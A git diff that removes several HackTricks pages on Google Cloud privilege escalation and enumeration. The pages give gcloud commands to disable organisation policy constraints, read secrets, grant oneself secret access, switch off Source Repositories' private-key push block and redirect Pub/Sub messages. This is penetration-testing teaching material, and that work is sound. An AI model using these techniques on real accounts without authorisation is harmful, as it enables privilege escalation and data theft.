- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md deleted file mode 100644 index 05cf0eeb1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - Generic Permissions Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Generic Interesting Permissions - -### \*.setIamPolicy - -If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\ -This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -### \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -### \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md deleted file mode 100644 index 60059cf64..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# GCP - Orgpolicy Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## orgpolicy - -### `orgpolicy.policy.set` - -An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected. - -{% code overflow="wrap" %} -```bash -# Get info -gcloud resource-manager org-policies describe [--folder | --organization | --project ] - -# Disable -gcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] -``` -{% endcode %} - -A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). - -## References - -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md deleted file mode 100644 index dbddd51d6..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Pubsub Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## PubSub - -Get more information in: - -{% content-ref url="../gcp-services/gcp-pub-sub.md" %} -[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md) -{% endcontent-ref %} - -### `pubsub.snapshots.create` - -The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. - -### **`pubsub.snapshots.setIamPolicy`** - -Assign the pervious permissions to you. - -### `pubsub.subscriptions.create` - -You can create a push subscription in a topic that will be sending all the received messages to the indicated URL - -### **`pubsub.subscriptions.update`** - -Set your own URL as push endpoint to steal the messages. - -### `pubsub.subscriptions.consume` - -Access messages using the subscription. - -### `pubsub.subscriptions.setIamPolicy` - -Give yourself any of the preiovus permissions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md deleted file mode 100644 index 2d4dea5a5..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Resourcemanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## resourcemanager - -### `resourcemanager.organizations.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. - -### `resourcemanager.folders.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. - -### `resourcemanager.projects.setIamPolicy` - -Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md deleted file mode 100644 index 9f5c5a7d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Secretmanager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## secretmanager - -For more information about secretmanager: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretmanager.versions.access` - -This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret): - -```bash -# Get clear-text of version 1 of secret: "" -gcloud secrets versions access 1 --secret="" -``` - -As this is also a post exploitation technique it can be found in: - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### `secretmanager.secrets.setIamPolicy` - -This give you access to give you access to read the secrets from the secret manager, like using: - -```bash -gcloud secrets add-iam-policy-binding \ - --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ - --role="roles/secretmanager.secretAccessor" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md deleted file mode 100644 index 8ef9a508e..000000000 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Sourcerepos Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### `source.repos.get` - -With this permission it's possible to download the repository locally: - -```bash -gcloud source repos clone --project= -``` - -### `source.repos.update` - -A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like: - -* Owner -* Editor -* Source Repository Administrator (`roles/source.admin`) -* Source Repository Writer (`roles/source.writer`) - -To write just perform a regular **`git push`**. - -### `source.repos.setIamPolicy` - -With this permission an attacker could grant himself the previous permissions. - -### Secret access - -If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check: - -{% content-ref url="gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Add SSH keys - -It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh\_keys](https://source.cloud.google.com/user/ssh_keys) - -Once your ssh key is set, you can access a repo with: - -{% code overflow="wrap" %} -```bash -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -``` -{% endcode %} - -And then use **`git`** commands are per usual. - -### Manual Credentials - -It's possible to create manual credentials to access the Source Repositories: - -
- -Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3) - -Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this. - -This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`** - -
- -Executing the script you can then use git clone, push... and it will work. - -### `source.repos.updateProjectConfig` - -With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys: - -```bash -gcloud source project-configs update --disable-pushblock -``` - -You can also configure a different pub/sub topic or even disable it completely: - -```bash -gcloud source project-configs update --remove-topic=REMOVE_TOPIC -gcloud source project-configs update --remove-topic=UPDATE_TOPIC -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md deleted file mode 100644 index abbec6712..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - AI Platform Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) - -Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**. - -There are a few areas here you can look for interesting information like models and jobs. - -```bash -# Models -gcloud ai-platform models list -gcloud ai-platform models describe -gcloud ai-platform models get-iam-policy - -# Jobs -gcloud ai-platform jobs list -gcloud ai-platform jobs describe -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md deleted file mode 100644 index 0b4eea5f9..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - API Keys Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data. - -### Restrictions - -You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP. - -### Enumeration - -It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe: - -```bash -gcloud services api-keys list -gcloud services api-keys describe -gcloud services api-keys list --show-deleted -``` - -{% hint style="info" %} -It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys. -{% endhint %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %} -[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %} -[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md deleted file mode 100644 index 4cb12e714..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# GCP - Batch Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations. - -### Service Account - -Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually). - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List jobs -gcloud batch jobs list - -# Get job info -gcloud batch jobs describe --location - -# List tasks -gcloud batch tasks list --location --job - -# Gte info of tasks executions -gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/ -``` -{% endcode %} - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %} -[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md deleted file mode 100644 index 7d8c2c5e7..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md +++ /dev/null @@ -1,58 +0,0 @@ -# GCP - Bigtable Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) - -A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). - -```bash -# Cloud Bigtable -gcloud bigtable instances list -gcloud bigtable instances describe -gcloud bigtable instances get-iam-policy - -## Clusters -gcloud bigtable clusters list -gcloud bigtable clusters describe - -## Backups -gcloud bigtable backups list --instance -gcloud bigtable backups describe --instance -gcloud bigtable backups get-iam-policy --instance - -## Hot Tables -gcloud bigtable hot-tablets list - -## App Profiles -gcloud bigtable app-profiles list --instance -gcloud bigtable app-profiles describe --instance -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
